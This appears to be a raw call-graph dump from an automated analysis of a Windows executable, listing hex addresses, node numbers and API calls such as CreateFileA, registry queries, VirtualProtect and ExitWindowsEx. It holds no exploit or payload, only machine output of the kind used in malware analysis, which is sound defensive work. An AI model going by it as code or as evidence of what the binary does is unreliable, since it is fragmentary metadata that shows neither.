409448 6270->6279 6274 403198 4 API calls 6272->6274 6273 40ac62 6273->6272 6276 40ac80 MessageBoxA 6273->6276 6275 40acc0 6274->6275 6277 403198 4 API calls 6275->6277 6276->6272 6278 40acc8 6277->6278 6280 409454 GetCurrentProcess OpenProcessToken 6279->6280 6281 4094af ExitWindowsEx 6279->6281 6282 409466 6280->6282 6283 40946a LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 6280->6283 6281->6282 6282->6273 6283->6281 6283->6282 6738 40995e 6741 409960 6738->6741 6739 409982 6740 40999e CallWindowProcA 6740->6739 6741->6739 6741->6740 6742 409960 6743 409982 6742->6743 6744 40996f 6742->6744 6744->6743 6745 40999e CallWindowProcA 6744->6745 6745->6743 6746 405160 6747 405173 6746->6747 6748 404e58 33 API calls 6747->6748 6749 405187 6748->6749 6284 402e64 6285 402e69 6284->6285 6286 402e7a RtlUnwind 6285->6286 6287 402e5e 6285->6287 6288 402e9d 6286->6288 5906 40766c SetFilePointer 5907 4076a3 5906->5907 5908 407693 GetLastError 5906->5908 5908->5907 5909 40769c 5908->5909 5910 40748c 35 API calls 5909->5910 5910->5907 6301 40667c IsDBCSLeadByte 6302 406694 6301->6302 6762 403f7d 6763 403fa2 6762->6763 6766 403f84 6762->6766 6765 403e8e 4 API calls 6763->6765 6763->6766 6764 403f8c 6765->6766 6766->6764 6767 402674 4 API calls 6766->6767 6768 403fca 6767->6768 6769 403d02 6771 403d12 6769->6771 6770 403ddf ExitProcess 6771->6770 6772 403db8 6771->6772 6776 403dea 6771->6776 6779 403da4 6771->6779 6780 403d8f MessageBoxA 6771->6780 6773 403cc8 4 API calls 6772->6773 6774 403dc2 6773->6774 6775 403cc8 4 API calls 6774->6775 6777 403dcc 6775->6777 6789 4019dc 6777->6789 6785 403fe4 6779->6785 6780->6772 6781 403dd1 6781->6770 6781->6776 6786 403fe8 6785->6786 6787 403f07 4 API calls 6786->6787 6788 404006 6787->6788 6790 401abb 6789->6790 6791 4019ed 6789->6791 6790->6781 6792 401a04 RtlEnterCriticalSection 6791->6792 6793 401a0e LocalFree 6791->6793 6792->6793 6794 401a41 6793->6794 6795 401a49 6794->6795 6796 401a2f VirtualFree 6794->6796 6797 401a70 LocalFree 6795->6797 6798 401a87 6795->6798 6796->6794 6797->6797 6797->6798 6799 401aa9 RtlDeleteCriticalSection 6798->6799 6800 401a9f RtlLeaveCriticalSection 6798->6800 6799->6781 6800->6799 6307 404206 6308 4041cc 6307->6308 6309 40420a 6307->6309 6310 403154 4 API calls 6309->6310 6311 404282 6309->6311 6312 404323 6310->6312 6313 402c08 6314 402c82 6313->6314 6317 402c19 6313->6317 6315 402c56 RtlUnwind 6316 403154 4 API calls 6315->6316 6316->6314 6317->6314 6317->6315 6320 402b28 6317->6320 6321 402b31 RaiseException 6320->6321 6322 402b47 6320->6322 6321->6322 6322->6315 6323 408c10 6324 408c17 6323->6324 6325 403198 4 API calls 6324->6325 6333 408cb1 6325->6333 6326 408cdc 6327 4031b8 4 API calls 6326->6327 6328 408d69 6327->6328 6329 408cc8 6331 4032fc 18 API calls 6329->6331 6330 403278 18 API calls 6330->6333 6331->6326 6332 4032fc 18 API calls 6332->6333 6333->6326 6333->6329 6333->6330 6333->6332 6338 40a814 6339 40a839 6338->6339 6340 40993c 29 API calls 6339->6340 6343 40a83e 6340->6343 6341 40a891 6372 4026c4 GetSystemTime 6341->6372 6343->6341 6346 408dd8 18 API calls 6343->6346 6344 40a896 6345 409330 46 API calls 6344->6345 6347 40a89e 6345->6347 6348 40a86d 6346->6348 6349 4031e8 18 API calls 6347->6349 6352 40a875 MessageBoxA 6348->6352 6350 40a8ab 6349->6350 6351 406928 19 API calls 6350->6351 6353 40a8b8 6351->6353 6352->6341 6354 40a882 6352->6354 6355 4066c0 19 API calls 6353->6355 6356 405864 19 API calls 6354->6356 6357 40a8c8 6355->6357 6356->6341 6358 406638 19 API calls 6357->6358 6359 40a8d9 6358->6359 6360 403340 18 API calls 6359->6360 6361 40a8e7 6360->6361 6362 4031e8 18 API calls 6361->6362 6363 40a8f7 6362->6363 6364 4074e0 37 API calls 6363->6364 6365 40a936 6364->6365 6366 402594 18 API calls 6365->6366 6367 40a956 6366->6367 6368 407a28 19 API calls 6367->6368 6369 40a998 6368->6369 6370 407cb8 35 API calls 6369->6370 6371 40a9bf 6370->6371 6372->6344 5450 407017 5451 407008 SetErrorMode 5450->5451 6373 403018 6374 403070 6373->6374 6375 403025 6373->6375 6376 40302a RtlUnwind 6375->6376 6377 40304e 6376->6377 6379 402f78 6377->6379 6380 402be8 6377->6380 6381 402bf1 RaiseException 6380->6381 6382 402c04 6380->6382 6381->6382 6382->6374 6387 40901e 6388 409010 6387->6388 6389 408fac Wow64RevertWow64FsRedirection 6388->6389 6390 409018 6389->6390 6391 409020 SetLastError 6392 409029 6391->6392 6407 403a28 ReadFile 6408 403a46 6407->6408 6409 403a49 GetLastError 6407->6409 5911 40762c ReadFile 5912 407663 5911->5912 5913 40764c 5911->5913 5914 407652 GetLastError 5913->5914 5915 40765c 5913->5915 5914->5912 5914->5915 5916 40748c 35 API calls 5915->5916 5916->5912 6811 40712e 6812 407118 6811->6812 6813 403198 4 API calls 6812->6813 6814 407120 6813->6814 6815 403198 4 API calls 6814->6815 6816 407128 6815->6816 5931 40a82f 5932 409ae8 18 API calls 5931->5932 5933 40a834 5932->5933 5934 40a839 5933->5934 5935 402f24 5 API calls 5933->5935 5968 40993c 5934->5968 5935->5934 5937 40a891 5973 4026c4 GetSystemTime 5937->5973 5939 40a83e 5939->5937 6034 408dd8 5939->6034 5940 40a896 5974 409330 5940->5974 5944 40a86d 5948 40a875 MessageBoxA 5944->5948 5945 4031e8 18 API calls 5946 40a8ab 5945->5946 5992 406928 5946->5992 5948->5937 5950 40a882 5948->5950 6037 405864 5950->6037 5955 40a8d9 6019 403340 5955->6019 5957 40a8e7 5958 4031e8 18 API calls 5957->5958 5959 40a8f7 5958->5959 5960 4074e0 37 API calls 5959->5960 5961 40a936 5960->5961 5962 402594 18 API calls 5961->5962 5963 40a956 5962->5963 5964 407a28 19 API calls 5963->5964 5965 40a998 5964->5965 5966 407cb8 35 API calls 5965->5966 5967 40a9bf 5966->5967 6041 40953c 5968->6041 5971 4098cc 19 API calls 5972 40995c 5971->5972 5972->5939 5973->5940 5977 409350 5974->5977 5978 409375 CreateDirectoryA 5977->5978 5983 408dd8 18 API calls 5977->5983 5984 404c94 33 API calls 5977->5984 5987 407284 19 API calls 5977->5987 5990 408da8 18 API calls 5977->5990 5991 405890 18 API calls 5977->5991 6097 406cf4 5977->6097 6120 409224 5977->6120 5979 4093ed 5978->5979 5980 40937f GetLastError 5978->5980 5981 40322c 4 API calls 5979->5981 5980->5977 5982 4093f7 5981->5982 5985 4031b8 4 API calls 5982->5985 5983->5977 5984->5977 5986 409411 5985->5986 5988 4031b8 4 API calls 5986->5988 5987->5977 5989 40941e 5988->5989 5989->5945 5990->5977 5991->5977 6226 406820 5992->6226 5995 403454 18 API calls 5996 40694a 5995->5996 5997 4066c0 5996->5997 6231 4068e4 5997->6231 6000 4066f0 6003 403340 18 API calls 6000->6003 6001 4066fe 6002 403454 18 API calls 6001->6002 6005 406711 6002->6005 6004 4066fc 6003->6004 6007 403198 4 API calls 6004->6007 6006 403340 18 API calls 6005->6006 6006->6004 6008 406733 6007->6008 6009 406638 6008->6009 6010 406642 6009->6010 6011 406665 6009->6011 6237 406950 6010->6237 6013 40322c 4 API calls 6011->6013 6014 40666e 6013->6014 6014->5955 6015 406649 6015->6011 6016 406654 6015->6016 6017 403340 18 API calls 6016->6017 6018 406662 6017->6018 6018->5955 6020 403344 6019->6020 6021 4033a5 6019->6021 6022 4031e8 6020->6022 6023 40334c 6020->6023 6028 403254 18 API calls 6022->6028 6029 4031fc 6022->6029 6023->6021 6025 40335b 6023->6025 6026 4031e8 18 API calls 6023->6026 6024 403228 6024->5957 6027 403254 18 API calls 6025->6027 6026->6025 6031 403375 6027->6031 6028->6029 6029->6024 6030 4025ac 4 API calls 6029->6030 6030->6024 6032 4031e8 18 API calls 6031->6032 6033 4033a1 6032->6033 6033->5957 6035 408da8 18 API calls 6034->6035 6036 408df4 6035->6036 6036->5944 6038 405869 6037->6038 6039 405940 19 API calls 6038->6039 6040 40587b 6039->6040 6040->6040 6048 40955b 6041->6048 6042 409590 6044 40959d GetUserDefaultLangID 6042->6044 6049 409592 6042->6049 6043 409594 6053 407024 GetModuleHandleA GetProcAddress 6043->6053 6044->6049 6047 40956f 6047->5971 6048->6042 6048->6043 6048->6047 6049->6047 6050 4095cb GetACP 6049->6050 6051 4095ef 6049->6051 6050->6047 6050->6049 6051->6047 6052 409615 GetACP 6051->6052 6052->6047 6052->6051 6054 407067 6053->6054 6055 40705e 6053->6055 6056 407070 6054->6056 6057 4070a8 6054->6057 6064 403198 4 API calls 6055->6064 6074 406f68 6056->6074 6058 406f68 RegOpenKeyExA 6057->6058 6062 4070c1 6058->6062 6060 407089 6061 4070de 6060->6061 6077 406f5c 6060->6077 6066 40322c 4 API calls 6061->6066 6062->6061 6065 406f5c 20 API calls 6062->6065 6068 407120 6064->6068 6069 4070d5 RegCloseKey 6065->6069 6070 4070eb 6066->6070 6071 403198 4 API calls 6068->6071 6069->6061 6072 4032fc 18 API calls 6070->6072 6073 407128 6071->6073 6072->6055 6073->6049 6075 406f73 6074->6075 6076 406f79 RegOpenKeyExA 6074->6076 6075->6076 6076->6060 6080 406e10 6077->6080 6081 406e36 RegQueryValueExA 6080->6081 6082 406e7b 6081->6082 6088 406e59 6081->6088 6084 403198 4 API calls 6082->6084 6083 406e73 6085 403198 4 API calls 6083->6085 6086 406f47 RegCloseKey 6084->6086 6085->6082 6086->6061 6087 403278 18 API calls 6087->6088 6088->6082 6088->6083 6088->6087 6089 403420 18 API calls 6088->6089 6090 406eb0 RegQueryValueExA 6089->6090 6090->6081 6092 406ecc 6090->6092 6091 4034f0 18 API calls 6093 406f0e 6091->6093 6092->6082 6092->6091 6094 406f20 6093->6094 6096 403420 18 API calls 6093->6096 6095 4031e8 18 API calls 6094->6095 6095->6082 6096->6094 6139 406a58 6097->6139 6100 406d26 6102 406a58 19 API calls 6100->6102 6104 406d72 6100->6104 6103 406d36 6102->6103 6105 406d42 6103->6105 6108 406a34 21 API calls 6103->6108 6147 406888 6104->6147 6105->6104 6106 406d67 6105->6106 6109 406a58 19 API calls 6105->6109 6106->6104 6159 406cc8 GetWindowsDirectoryA 6106->6159 6108->6105 6112 406d5b 6109->6112 6112->6106 6115 406a34 21 API calls 6112->6115 6113 406638 19 API calls 6114 406d87 6113->6114 6116 40322c 4 API calls 6114->6116 6115->6106 6117 406d91 6116->6117 6118 4031b8 4 API calls 6117->6118 6119 406dab 6118->6119 6119->5977 6121 409244 6120->6121 6122 406638 19 API calls 6121->6122 6123 40925d 6122->6123 6124 40322c 4 API calls 6123->6124 6131 409268 6124->6131 6125 406978 20 API calls 6125->6131 6127 408dd8 18 API calls 6127->6131 6128 4033b4 18 API calls 6128->6131 6130 405890 18 API calls 6130->6131 6131->6125 6131->6127 6131->6128 6131->6130 6132 4092e4 6131->6132 6199 4091b0 6131->6199 6207 409034 6131->6207 6133 40322c 4 API calls 6132->6133 6134 4092ef 6133->6134 6135 4031b8 4 API calls 6134->6135 6136 409309 6135->6136 6137 403198 4 API calls 6136->6137 6138 409311 6137->6138 6138->5977 6140 4034f0 18 API calls 6139->6140 6141 406a6b 6140->6141 6142 406a82 GetEnvironmentVariableA 6141->6142 6146 406a95 6141->6146 6161 406dec 6141->6161 6142->6141 6143 406a8e 6142->6143 6144 403198 4 API calls 6143->6144 6144->6146 6146->6100 6156 406a34 6146->6156 6148 403414 6147->6148 6149 4068ab GetFullPathNameA 6148->6149 6150 4068b7 6149->6150 6151 4068ce 6149->6151 6150->6151 6152 4068bf 6150->6152 6153 40322c 4 API calls 6151->6153 6154 403278 18 API calls 6152->6154 6155 4068cc 6153->6155 6154->6155 6155->6113 6165 4069dc 6156->6165 6160 406ce9 6159->6160 6160->6104 6162 406dfa 6161->6162 6163 4034f0 18 API calls 6162->6163 6164 406e08 6163->6164 6164->6141 6172 406978 6165->6172 6167 4069fe 6168 406a06 GetFileAttributesA 6167->6168 6169 406a1b 6168->6169 6170 403198 4 API calls 6169->6170 6171 406a23 6170->6171 6171->6100 6182 406744 6172->6182 6174 4069b0 6177 4069c6 6174->6177 6178 4069bb 6174->6178 6176 406989 6176->6174 6189 406970 CharPrevA 6176->6189 6190 403454 6177->6190 6179 40322c 4 API calls 6178->6179 6181 4069c4 6179->6181 6181->6167 6183 406755 6182->6183 6184 4067b9 6183->6184 6188 406773 6183->6188 6185 406680 IsDBCSLeadByte 6184->6185 6186 4067b4 6184->6186 6185->6186 6186->6176 6188->6186 6197 406680 IsDBCSLeadByte 6188->6197 6189->6176 6191 403486 6190->6191 6192 403459 6190->6192 6193 403198 4 API calls 6191->6193 6192->6191 6195 40346d 6192->6195 6194 40347c 6193->6194 6194->6181 6196 403278 18 API calls 6195->6196 6196->6194 6198 406694 6197->6198 6198->6188 6200 403198 4 API calls 6199->6200 6202 4091d1 6200->6202 6204 4091fe 6202->6204 6216 4032a8 6202->6216 6219 403494 6202->6219 6205 403198 4 API calls 6204->6205 6206 409213 6205->6206 6206->6131 6208 408f70 2 API calls 6207->6208 6209 40904a 6208->6209 6210 40904e 6209->6210 6223 406a48 6209->6223 6210->6131 6213 409081 6214 408fac Wow64RevertWow64FsRedirection 6213->6214 6215 409089 6214->6215 6215->6131 6217 403278 18 API calls 6216->6217 6218 4032b5 6217->6218 6218->6202 6220 403498 6219->6220 6222 4034c3 6219->6222 6221 4034f0 18 API calls 6220->6221 6221->6222 6222->6202 6224 4069dc 21 API calls 6223->6224 6225 406a52 GetLastError 6224->6225 6225->6213 6227 406744 IsDBCSLeadByte 6226->6227 6229 406835 6227->6229 6228 40687f 6228->5995 6229->6228 6230 406680 IsDBCSLeadByte 6229->6230 6230->6229 6232 4068f3 6231->6232 6233 406820 IsDBCSLeadByte 6232->6233 6236 4068fe 6233->6236 6234 4066ea 6234->6000 6234->6001 6235 406680 IsDBCSLeadByte 6235->6236 6236->6234 6236->6235 6238 406957 6237->6238 6239 40695b 6237->6239 6238->6015 6242 406970 CharPrevA 6239->6242 6241 40696c 6241->6015 6242->6241 6817 408f30 6820 408dfc 6817->6820 6821 408e05 6820->6821 6822 403198 4 API calls 6821->6822 6823 408e13 6821->6823 6822->6821 6824 403932 6825 403924 6824->6825 6826 40374c VariantClear 6825->6826 6827 40392c 6826->6827 5387 4075c4 SetFilePointer 5388 4075f7 5387->5388 5389 4075e7 GetLastError 5387->5389 5389->5388 5390 4075f0 5389->5390 5392 40748c GetLastError 5390->5392 5395 4073ec 5392->5395 5396 407284 19 API calls 5395->5396 5398 407414 5396->5398 5397 407434 5400 405890 18 API calls 5397->5400 5398->5397 5399 405194 33 API calls 5398->5399 5399->5397 5401 407443 5400->5401 5402 403198 4 API calls 5401->5402 5403 407460 5402->5403 5403->5388 6418 4076c8 WriteFile 6419 4076e8 6418->6419 6422 4076ef 6418->6422 6420 40748c 35 API calls 6419->6420 6420->6422 6421 407700 6422->6421 6423 4073ec 34 API calls 6422->6423 6423->6421 6424 402ccc 6427 402cfe 6424->6427 6428 402cdd 6424->6428 6425 402d88 RtlUnwind 6426 403154 4 API calls 6425->6426 6426->6427 6428->6425 6428->6427 6429 402b28 RaiseException 6428->6429 6430 402d7f 6429->6430 6430->6425 6836 403fcd 6837 403f07 4 API calls 6836->6837 6838 403fd6 6837->6838 6839 403e9c 4 API calls 6838->6839 6840 403fe2 6839->6840 6437 4024d0 6438 4024e4 6437->6438 6439 4024e9 6437->6439 6442 401918 4 API calls 6438->6442 6440 402518 6439->6440 6441 40250e RtlEnterCriticalSection 6439->6441 6444 4024ed 6439->6444 6452 402300 6440->6452 6441->6440 6442->6439 6445 402525 6448 402581 6445->6448 6449 402577 RtlLeaveCriticalSection 6445->6449 6447 401fd4 14 API calls 6450 402531 6447->6450 6449->6448 6450->6445 6451 40215c 9 API calls 6450->6451 6451->6445 6453 402314 6452->6453 6455 4023b8 6453->6455 6456 402335 6453->6456 6454 402344 6454->6445 6454->6447 6455->6454 6457 401d80 9 API calls 6455->6457 6460 402455 6455->6460 6462 401e84 6455->6462 6456->6454 6458 401b74 9 API calls 6456->6458 6457->6455 6458->6454 6460->6454 6461 401d00 9 API calls 6460->6461 6461->6454 6467 401768 6462->6467 6464 401e99 6465 401ea6 6464->6465 6466 401dcc 9 API calls 6464->6466 6465->6455 6466->6465 6469 401787 6467->6469 6468 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 6468->6469 6469->6468 6470 40183b 6469->6470 6471 40132c LocalAlloc 6469->6471 6473 401821 6469->6473 6475 4017d6 6469->6475 6472 4015c4 VirtualAlloc 6470->6472 6476 4017e7 6470->6476 6471->6469 6472->6476 6474 40150c VirtualFree 6473->6474 6474->6476 6477 40150c VirtualFree 6475->6477 6476->6464 6477->6476 6478 4028d2 6479 4028da 6478->6479 6480 403554 4 API calls 6479->6480 6481 4028ef 6479->6481 6480->6479 6482 4025ac 4 API calls 6481->6482 6483 4028f4 6482->6483 6841 4019d3 6842 4019ba 6841->6842 6843 4019c3 RtlLeaveCriticalSection 6842->6843 6844 4019cd 6842->6844 6843->6844 5404 407fd4 5405 407fe6 5404->5405 5406 407fed 5404->5406 5415 407f10 5405->5415 5408 408021 5406->5408 5409 408015 5406->5409 5410 408017 5406->5410 5411 40804e 5408->5411 5413 407d7c 33 API calls 5408->5413 5429 407e2c 5409->5429 5426 407d7c 5410->5426 5413->5411 5416 407f25 5415->5416 5417 407d7c 33 API calls 5416->5417 5418 407f34 5416->5418 5417->5418 5419 407f6e 5418->5419 5420 407d7c 33 API calls 5418->5420 5421 407f82 5419->5421 5422 407d7c 33 API calls 5419->5422 5420->5419 5425 407fae 5421->5425 5436 407eb8 5421->5436 5422->5421 5425->5406 5439 4058c4 5426->5439 5428 407d9e 5428->5408 5430 405194 33 API calls 5429->5430 5431 407e57 5430->5431 5447 407de4 5431->5447 5433 407e5f 5434 403198 4 API calls 5433->5434 5435 407e74 5434->5435 5435->5408 5437 407ec7 VirtualFree 5436->5437 5438 407ed9 VirtualAlloc 5436->5438 5437->5438 5438->5425 5441 4058d0 5439->5441 5440 405194 33 API calls 5442 4058fd 5440->5442 5441->5440 5443 4031e8 18 API calls 5442->5443 5444 405908 5443->5444 5445 403198 4 API calls 5444->5445 5446 40591d 5445->5446 5446->5428 5448 4058c4 33 API calls 5447->5448 5449 407e06 5448->5449 5449->5433 6484 405ad4 6485 405ae4 6484->6485 6486 405adc 6484->6486 6487 405ae2 6486->6487 6488 405aeb 6486->6488 6491 405a4c 6487->6491 6489 405940 19 API calls 6488->6489 6489->6485 6492 405a54 6491->6492 6493 405a6e 6492->6493 6494 403154 4 API calls 6492->6494 6495 405a73 6493->6495 6496 405a8a 6493->6496 6494->6492 6497 405940 19 API calls 6495->6497 6498 403154 4 API calls 6496->6498 6499 405a86 6497->6499 6500 405a8f 6498->6500 6502 403154 4 API calls 6499->6502 6501 4059b0 33 API calls 6500->6501 6501->6499 6503 405ab8 6502->6503 6504 403154 4 API calls 6503->6504 6505 405ac6 6504->6505 6505->6485 5917 40a9de 5918 40aa03 5917->5918 5919 407918 InterlockedExchange 5918->5919 5920 40aa2d 5919->5920 5921 40aa3d 5920->5921 5922 409ae8 18 API calls 5920->5922 5927 4076ac SetEndOfFile 5921->5927 5922->5921 5924 40aa59 5925 4025ac 4 API calls 5924->5925 5926 40aa90 5925->5926 5928 4076c3 5927->5928 5929 4076bc 5927->5929 5928->5924 5930 40748c 35 API calls 5929->5930 5930->5928 6848 402be9 RaiseException 6849 402c04 6848->6849 6516 402af2 6517 402afe 6516->6517 6520 402ed0 6517->6520 6521 403154 4 API calls 6520->6521 6522 402ee0 6521->6522 6523 402b03 6522->6523 6525 402b0c 6522->6525 6526 402b25 6525->6526 6527 402b15 RaiseException 6525->6527 6526->6523 6527->6526 5455 40a5f8 5498 4030dc 5455->5498 5457 40a60e 5501 4042e8 5457->5501 5459 40a613 5504 40457c GetModuleHandleA GetProcAddress 5459->5504 5463 40a61d 5512 4065c8 5463->5512 5465 40a622 5521 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 5465->5521 5472 40a665 5543 406c2c 5472->5543 5476 4031e8 18 API calls 5477 40a683 5476->5477 5557 4074e0 5477->5557 5483 407918 InterlockedExchange 5485 40a6d2 5483->5485 5484 40a710 5577 4074a0 5484->5577 5485->5484 5614 409ae8 5485->5614 5487 40a751 5581 407a28 5487->5581 5488 40a736 5488->5487 5489 409ae8 18 API calls 5488->5489 5489->5487 5491 40a776 5591 408b08 5491->5591 5495 40a7bc 5496 408b08 35 API calls 5495->5496 5497 40a7f5 5495->5497 5496->5495 5624 403094 5498->5624 5500 4030e1 GetModuleHandleA GetCommandLineA 5500->5457 5502 403154 4 API calls 5501->5502 5503 404323 5501->5503 5502->5503 5503->5459 5505 404598 5504->5505 5506 40459f GetProcAddress 5504->5506 5505->5506 5507 4045b5 GetProcAddress 5506->5507 5508 4045ae 5506->5508 5509 4045c4 SetProcessDEPPolicy 5507->5509 5510 4045c8 5507->5510 5508->5507 5509->5510 5511 404624 6F561CD0 5510->5511 5511->5463 5625 405ca8 5512->5625 5522 4090f7 5521->5522 5709 406fa0 SetErrorMode 5522->5709 5525 407284 19 API calls 5526 409127 5525->5526 5527 403198 4 API calls 5526->5527 5528 40913c 5527->5528 5529 409b78 GetSystemInfo VirtualQuery 5528->5529 5530 409ba2 5529->5530 5531 409c2c 5529->5531 5530->5531 5532 409c0d VirtualQuery 5530->5532 5533 409bcc VirtualProtect 5530->5533 5534 409bfb VirtualProtect 5530->5534 5535 409768 5531->5535 5532->5530 5532->5531 5533->5530 5534->5532 5715 406bd0 GetCommandLineA 5535->5715 5537 409850 5538 4031b8 4 API calls 5537->5538 5540 40986a 5538->5540 5539 406c2c 20 API calls 5541 409785 5539->5541 5540->5472 5607 409c88 5540->5607 5541->5537 5541->5539 5542 403454 18 API calls 5541->5542 5542->5541 5544 406c53 GetModuleFileNameA 5543->5544 5545 406c77 GetCommandLineA 5543->5545 5546 403278 18 API calls 5544->5546 5553 406c7c 5545->5553 5547 406c75 5546->5547 5551 406ca4 5547->5551 5548 406c81 5549 403198 4 API calls 5548->5549 5552 406c89 5549->5552 5550 406af0 18 API calls 5550->5553 5554 403198 4 API calls 5551->5554 5555 40322c 4 API calls 5552->5555 5553->5548 5553->5550 5553->5552 5556 406cb9 5554->5556 5555->5551 5556->5476 5558 4074ea 5557->5558 5722 407576 5558->5722 5725 407578 5558->5725 5559 407516 5560 40752a 5559->5560 5561 40748c 35 API calls 5559->5561 5564 409c34 FindResourceA 5560->5564 5561->5560 5565 409c49 5564->5565 5566 409c4e SizeofResource 5564->5566 5567 409ae8 18 API calls 5565->5567 5568 409c60 LoadResource 5566->5568 5569 409c5b 5566->5569 5567->5566 5571 409c73 LockResource 5568->5571 5572 409c6e 5568->5572 5570 409ae8 18 API calls 5569->5570 5570->5568 5574 409c84 5571->5574 5575 409c7f 5571->5575 5573 409ae8 18 API calls 5572->5573 5573->5571 5574->5483 5574->5485 5576 409ae8 18 API calls 5575->5576 5576->5574 5578 4074b4 5577->5578 5579 4074c4 5578->5579 5580 4073ec 34 API calls 5578->5580 5579->5488 5580->5579 5582 407a35 5581->5582 5583 405890 18 API calls 5582->5583 5584 407a89 5582->5584 5583->5584 5585 407918 InterlockedExchange 5584->5585 5586 407a9b 5585->5586 5587 405890 18 API calls 5586->5587 5588 407ab1 5586->5588 5587->5588 5589 405890 18 API calls 5588->5589 5590 407af4 5588->5590 5589->5590 5590->5491 5593 408b39 5591->5593 5598 408b82 5591->5598 5592 408bcd 5728 407cb8 5592->5728 5596 4034f0 18 API calls 5593->5596 5593->5598 5601 403420 18 API calls 5593->5601 5602 4031e8 18 API calls 5593->5602 5606 407cb8 35 API calls 5593->5606 5595 407cb8 35 API calls 5595->5598 5596->5593 5597 408be4 5600 4031b8 4 API calls 5597->5600 5598->5592 5598->5595 5599 4034f0 18 API calls 5598->5599 5604 403420 18 API calls 5598->5604 5605 4031e8 18 API calls 5598->5605 5599->5598 5603 408bfe 5600->5603 5601->5593 5602->5593 5621 404c20 5603->5621 5604->5598 5605->5598 5606->5593 5608 40322c 4 API calls 5607->5608 5609 409cab 5608->5609 5610 409cba MessageBoxA 5609->5610 5611 409ccf 5610->5611 5612 403198 4 API calls 5611->5612 5613 409cd7 5612->5613 5613->5472 5615 409af1 5614->5615 5616 409b09 5614->5616 5618 405890 18 API calls 5615->5618 5617 405890 18 API calls 5616->5617 5619 409b1a 5617->5619 5620 409b03 5618->5620 5619->5484 5620->5484 5750 402594 5621->5750 5623 404c2b 5623->5495 5624->5500 5626 405940 19 API calls 5625->5626 5627 405cb9 5626->5627 5628 405280 GetSystemDefaultLCID 5627->5628 5632 4052b6 5628->5632 5629 404cdc 19 API calls 5629->5632 5630 40520c 19 API calls 5630->5632 5631 4031e8 18 API calls 5631->5632 5632->5629 5632->5630 5632->5631 5636 405318 5632->5636 5633 404cdc 19 API calls 5633->5636 5634 40520c 19 API calls 5634->5636 5635 4031e8 18 API calls 5635->5636 5636->5633 5636->5634 5636->5635 5637 40539b 5636->5637 5638 4031b8 4 API calls 5637->5638 5639 4053b5 5638->5639 5640 4053c4 GetSystemDefaultLCID 5639->5640 5697 40520c GetLocaleInfoA 5640->5697 5643 4031e8 18 API calls 5644 405404 5643->5644 5645 40520c 19 API calls 5644->5645 5646 405419 5645->5646 5647 40520c 19 API calls 5646->5647 5648 40543d 5647->5648 5703 405258 GetLocaleInfoA 5648->5703 5651 405258 GetLocaleInfoA 5652 40546d 5651->5652 5653 40520c 19 API calls 5652->5653 5654 405487 5653->5654 5655 405258 GetLocaleInfoA 5654->5655 5656 4054a4 5655->5656 5657 40520c 19 API calls 5656->5657 5658 4054be 5657->5658 5659 4031e8 18 API calls 5658->5659 5660 4054cb 5659->5660 5661 40520c 19 API calls 5660->5661 5662 4054e0 5661->5662 5663 4031e8 18 API calls 5662->5663 5664 4054ed 5663->5664 5665 405258 GetLocaleInfoA 5664->5665 5666 4054fb 5665->5666 5667 40520c 19 API calls 5666->5667 5668 405515 5667->5668 5669 4031e8 18 API calls 5668->5669 5670 405522 5669->5670 5671 40520c 19 API calls 5670->5671 5672 405537 5671->5672 5673 4031e8 18 API calls 5672->5673 5674 405544 5673->5674 5675 40520c 19 API calls 5674->5675 5676 405559 5675->5676 5677 405576 5676->5677 5678 405567 5676->5678 5680 40322c 4 API calls 5677->5680 5705 40322c 5678->5705 5681 405574 5680->5681 5682 40520c 19 API calls 5681->5682 5683 405598 5682->5683 5684 4055b5 5683->5684 5685 4055a6 5683->5685 5687 403198 4 API calls 5684->5687 5686 40322c 4 API calls 5685->5686 5688 4055b3 5686->5688 5687->5688 5689 4033b4 18 API calls 5688->5689 5690 4055d7 5689->5690 5691 4033b4 18 API calls 5690->5691 5692 4055f1 5691->5692 5693 4031b8 4 API calls 5692->5693 5694 40560b 5693->5694 5695 405cf4 GetVersionExA 5694->5695 5696 405d0b 5695->5696 5696->5465 5698 405233 5697->5698 5699 405245 5697->5699 5700 403278 18 API calls 5698->5700 5701 40322c 4 API calls 5699->5701 5702 405243 5700->5702 5701->5702 5702->5643 5704 405274 5703->5704 5704->5651 5707 403230 5705->5707 5706 403252 5706->5681 5707->5706 5708 4025ac 4 API calls 5707->5708 5708->5706 5713 403414 5709->5713 5712 406fee 5712->5525 5714 403418 LoadLibraryA 5713->5714 5714->5712 5716 406af0 18 API calls 5715->5716 5717 406bf3 5716->5717 5718 406af0 18 API calls 5717->5718 5719 406c05 5717->5719 5718->5717 5720 403198 4 API calls 5719->5720 5721 406c1a 5720->5721 5721->5541 5723 407578 5722->5723 5724 4075b7 CreateFileA 5723->5724 5724->5559 5726 403414 5725->5726 5727 4075b7 CreateFileA 5726->5727 5727->5559 5729 407cd3 5728->5729 5733 407cc8 5728->5733 5734 407c5c 5729->5734 5732 405890 18 API calls 5732->5733 5733->5597 5735 407c70 5734->5735 5736 407caf 5734->5736 5735->5736 5738 407bac 5735->5738 5736->5732 5736->5733 5739 407bb7 5738->5739 5740 407bc8 5738->5740 5741 405890 18 API calls 5739->5741 5742 4074a0 34 API calls 5740->5742 5741->5740 5743 407bdc 5742->5743 5744 4074a0 34 API calls 5743->5744 5745 407bfd 5744->5745 5746 407918 InterlockedExchange 5745->5746 5747 407c12 5746->5747 5748 407c28 5747->5748 5749 405890 18 API calls 5747->5749 5748->5735 5749->5748 5751 402598 5750->5751 5753 4025a2 5750->5753 5756 401fd4 5751->5756 5752 40259e 5752->5753 5754 403154 4 API calls 5752->5754 5753->5623 5753->5753 5754->5753 5757 401fe8 5756->5757 5758 401fed 5756->5758 5767 401918 RtlInitializeCriticalSection 5757->5767 5760 402012 RtlEnterCriticalSection 5758->5760 5761 40201c 5758->5761 5764 401ff1 5758->5764 5760->5761 5761->5764 5774 401ee0 5761->5774 5764->5752 5765 402147 5765->5752 5766 40213d RtlLeaveCriticalSection 5766->5765 5768 40193c RtlEnterCriticalSection 5767->5768 5769 401946 5767->5769 5768->5769 5770 401964 LocalAlloc 5769->5770 5771 40197e 5770->5771 5772 4019c3 RtlLeaveCriticalSection 5771->5772 5773 4019cd 5771->5773 5772->5773 5773->5758 5777 401ef0 5774->5777 5775 401f1c 5779 401f40 5775->5779 5785 401d00 5775->5785 5777->5775 5777->5779 5780 401e58 5777->5780 5779->5765 5779->5766 5789 4016d8 5780->5789 5784 401e75 5784->5777 5786 401d4e 5785->5786 5787 401d1e 